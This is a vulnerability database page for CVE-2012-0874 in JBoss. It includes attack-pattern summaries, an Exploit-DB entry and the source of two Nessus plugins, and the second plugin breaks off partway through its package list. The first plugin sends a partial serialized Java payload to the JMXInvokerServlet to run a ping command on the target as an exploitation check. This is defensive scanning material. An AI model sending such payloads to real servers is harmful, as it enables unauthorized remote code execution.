CVE-2012-0874 - Improper Authentication vulnerability in Redhat products
Summary
The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. NOTE: this issue can only be exploited when the interceptor is not properly configured with a "second layer of authentication," or when used in conjunction with other vulnerabilities that bypass this second layer.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Authentication Abuse An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the "Exploitation of Session Variables, Resource IDs and other Trusted Credentials" attack patterns.
- Exploiting Trust in Client (aka Make the Client Invisible) An attack of this type exploits a program's vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, in what the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server, such that communication directly to the server is possible while the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
- Utilizing REST's Trust in the System Resource to Register Man in the Middle This attack utilizes a REST (REpresentational State Transfer)-style application's trust in the system resources and environment to place a man in the middle once SSL is terminated. The premise of REST applications is that they leverage existing infrastructure to deliver web services functionality. An example of this is a REST application that uses HTTP GET methods and receives an HTTP response with an XML document. These REST-style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately, from a security standpoint there frequently is no interoperable identity security mechanism deployed, so REST developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network: at the firewall, load balancer, or router. Once the SSL is terminated, the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password, that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized users do. There is typically no authentication on the client side beyond what is passed in the request itself, so once this is compromised, it is generally sufficient to compromise the service's authentication scheme.
- Man in the Middle Attack This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it were never intercepted. This interposition is transparent, leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identity between two components.
Exploit-Db
description | EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE. Remote exploit for windows platform |
file | exploits/windows/remote/30211.txt |
id | EDB-ID:30211 |
last seen | 2016-02-03 |
modified | 2013-12-11 |
platform | windows |
port | |
published | 2013-12-11 |
reporter | rgod |
source | https://www.exploit-db.com/download/30211/ |
title | EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE |
type | remote |
Nessus
NASL family | Web Servers |
NASL id | JBOSS_JAVA_SERIALIZE.NASL |
description | The remote JBoss server is affected by multiple remote code execution vulnerabilities : - A flaw exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. A remote attacker can exploit this issue to bypass authentication and invoke MBean methods, allowing arbitrary code to be executed in the context of the user running the server. (CVE-2012-0874) - The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host. (CVE-2015-7501) |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 87312 |
published | 2015-12-10 |
reporter | This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/87312 |
title | JBoss Java Object Deserialization RCE |
code |
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(87312);
  script_version("1.16");
  script_cvs_date("Date: 2019/11/22");

  script_cve_id("CVE-2012-0874", "CVE-2015-7501");
  script_bugtraq_id(57552, 78215);
  script_xref(name:"CERT", value:"576313");
  script_xref(name:"EDB-ID", value:"30211");

  script_name(english:"JBoss Java Object Deserialization RCE");
  script_summary(english:"Attempts to execute a command on the remote host via a crafted RMI request.");

  script_set_attribute(attribute:"synopsis", value:
"The remote JBoss server is affected by multiple remote code execution
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote JBoss server is affected by multiple remote code execution
vulnerabilities :

  - A flaw exists due to the JMXInvokerHAServlet and
    EJBInvokerHAServlet invoker servlets not properly
    restricting access to profiles. A remote attacker can
    exploit this issue to bypass authentication and invoke
    MBean methods, allowing arbitrary code to be executed in
    the context of the user running the server.
    (CVE-2012-0874)

  - The remote host is affected by a remote code execution
    vulnerability due to unsafe deserialize calls of
    unauthenticated Java objects to the Apache Commons
    Collections (ACC) library. An unauthenticated, remote
    attacker can exploit this, by sending a crafted RMI
    request, to execute arbitrary code on the target host.
    (CVE-2015-7501)");
  # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9c6d83db");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/solutions/2045023");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate interim fix according to the vendor advisory.

Alternatively, ensure that all exposed ports used by the JBoss server
are firewalled from any public networks.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-7501");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/12/10");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_a-mq");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_bpm_suite");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_data_virtualization");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_application_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_brms_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_portal_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_soa_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_web_server");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_fuse");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_fuse_service_works");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_operations_network");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:redhat:jboss_data_grid");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("string.inc");
include("http.inc");

port = get_http_port(default:8080, embedded:FALSE);

# Check http banner for JBoss
banner = get_http_banner(port: port);
if ("JBoss" >!< banner && "Apache-Coyote" >!< banner)
  audit(AUDIT_NOT_LISTEN,"JBoss",port);

# Open connection to JBoss.
soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL,"JBoss",port);

#
# setup unique id for pingback
#
id_tag = hexstr(rand_str(length:10));

#
# build request
#
rn = raw_string(0x0d, 0x0a);
raddress = get_host_ip();
laddress = compat::this_host();
cmd = "ping -c 10 -p " + string(id_tag) + " " + laddress;
cmdlen = strlen(cmd);
# The first part of the serialized object (a hex string) is not present on this page.
serObj = hex2raw(s:"...");
serObj += raw_string(cmdlen) + cmd;
serObj += hex2raw(s:"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A");
contentLen = strlen(serObj);
postdata =
  "POST /invoker/JMXInvokerServlet HTTP/1.1" + rn +
  "Host: "+ raddress +":"+ string(port) + rn +
  "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue" + rn +
  "Content-Length: " + string(contentLen) + rn +
  rn +
  serObj;

# See if we get a response from RMI payload
filter = "icmp and icmp[0] = 8 and src host " + raddress;
s = send_capture(socket:soc, data:postdata, pcap_filter:filter);
s = tolower(hexstr(get_icmp_element(icmp:s,element:"data")));
close(soc);

# No response, meaning we didn't get in
if(isnull(s) || id_tag >!< s) audit(AUDIT_LISTEN_NOT_VULN,"JBoss",port);

report = NULL;
if (report_verbosity > 0)
{
  report =
    '\n' + 'Nessus was able to exploit a Java deserialization vulnerability using' +
    '\n' + 'a crafted RMI request.' + '\n';
  security_hole(port:port, extra:report);
}
else security_hole(port:port);
NASL family | Red Hat Local Security Checks |
NASL id | REDHAT-RHSA-2013-0192.NASL |
description | Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 64079 |
published | 2013-01-24 |
reporter | This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/64079 |
title | RHEL 5 : JBoss EAP (RHSA-2013:0192) |
code |
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2013:0192. The text
# itself is copyright (C) Red Hat, Inc.
#

include("compat.inc");

if (description)
{
  script_id(64079);
  script_version("1.28");
  script_cvs_date("Date: 2019/10/24 15:35:36");

  script_cve_id("CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478");
  script_bugtraq_id(51392, 53877, 54183, 54631, 54915, 55770, 56812);
  script_xref(name:"RHSA", value:"2013:0192");

  script_name(english:"RHEL 5 : JBoss EAP (RHSA-2013:0192)");
  script_summary(english:"Checks the rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Red Hat host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix
multiple security issues, various bugs, and add several enhancements
are now available for Red Hat Enterprise Linux 5.

The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.

This JBoss Enterprise Application Platform 5.2.0 release serves as a
replacement for JBoss Enterprise Application Platform 5.1.2, and
includes bug fixes and enhancements. Refer to the JBoss Enterprise
Application Platform 5.2.0 Release Notes for information on the most
significant of these changes. The Release Notes will be available
shortly from https://access.redhat.com/knowledge/docs/

An attack technique against the W3C XML Encryption Standard when block
ciphers were used in CBC mode could allow a remote attacker to conduct
chosen-ciphertext attacks, leading to the recovery of the entire plain
text of a particular cryptogram. (CVE-2011-1096)

JBoss Web Services leaked side-channel data when distributing
symmetric keys (for XML encryption), allowing a remote attacker to
recover the entire plain text form of a symmetric key. (CVE-2011-2487)

Spring framework could possibly evaluate Expression Language (EL)
expressions twice, allowing a remote attacker to execute arbitrary
code in the context of the application server, or to obtain sensitive
information from the server. Manual action is required to apply this
fix. Refer to the Solution section. (CVE-2011-2730)

Apache CXF checked to ensure XML elements were signed or encrypted by
a Supporting Token, but not whether the correct token was used. A
remote attacker could transmit confidential information without the
appropriate security, and potentially circumvent access controls on
web services exposed via Apache CXF. Refer to the Solution section for
details. (CVE-2012-2379)

When an application used FORM authentication, along with another
component that calls request.setUserPrincipal() before the call to
FormAuthenticator#authenticate() (such as the Single-Sign-On valve),
it was possible to bypass the security constraint checks in the FORM
authenticator by appending '/j_security_check' to the end of a URL.
(CVE-2012-3546)

The JMX Console was vulnerable to CSRF attacks, allowing a remote
attacker to hijack the authenticated JMX Console session of an
administrator. (CVE-2011-2908)

An XSS flaw allowed a remote attacker to perform an XSS attack against
victims using the JMX Console. (CVE-2011-4575)

SecurityAssociation.getCredential() returned the previous credential
if no security context was provided. Depending on the deployed
applications, this could possibly allow a remote attacker to hijack
the credentials of a previously-authenticated user. (CVE-2012-3370)

Configuring the JMX Invoker to restrict access to users with specific
roles did not actually restrict access, allowing remote attackers with
valid JMX Invoker credentials to perform JMX operations accessible to
roles they are not a member of. (CVE-2012-5478)

twiddle.sh accepted credentials as command line arguments, allowing
local users to view them via a process listing. (CVE-2009-5066)

NonManagedConnectionFactory logged the username and password in plain
text when an exception was thrown. This could lead to the exposure of
authentication credentials if local users had permissions to read the
log file. (CVE-2012-0034)

The JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow
unauthenticated access by default in some profiles. The security
interceptor's second layer of authentication prevented direct
exploitation of this flaw. If the interceptor was misconfigured or
inadvertently disabled, this flaw could lead to arbitrary code
execution in the context of the user running the JBoss server.
(CVE-2012-0874)

The JGroups diagnostics service was enabled with no authentication
when a JGroups channel was started, allowing attackers on the adjacent
network to read diagnostic information. (CVE-2012-2377)

CallerIdentityLoginModule retained the password from the previous call
if a null password was provided. In non-default configurations this
could possibly lead to a remote attacker hijacking a
previously-authenticated user's session. (CVE-2012-3369)

Red Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum
for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project
for reporting CVE-2012-2379; and Tyler Krpata for reporting
CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by
Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of
Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and
CVE-2012-2377 was discovered by Red Hat."
  );
  # https://access.redhat.com/knowledge/docs/
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/documentation/en-us/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2013:0192"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-0034"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-2377"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-2908"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-1096"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-2379"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-3546"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2009-5066"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-5478"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-4575"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-3370"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-2487"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-2730"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-3369"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2012-0874"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:aopalliance");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:apache-cxf");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:bsh2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:google-guice");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-search");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hornetq");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:hornetq-native");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:javassist");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-aop2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cl");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-common-core");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-javaee");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-messaging");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-naming");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-reflect");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-remoting");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-client");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbosssx2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossts");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws-framework");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jbossws-spi");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jgroups");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-embedded");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:netty");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-federation");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy-examples");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc");
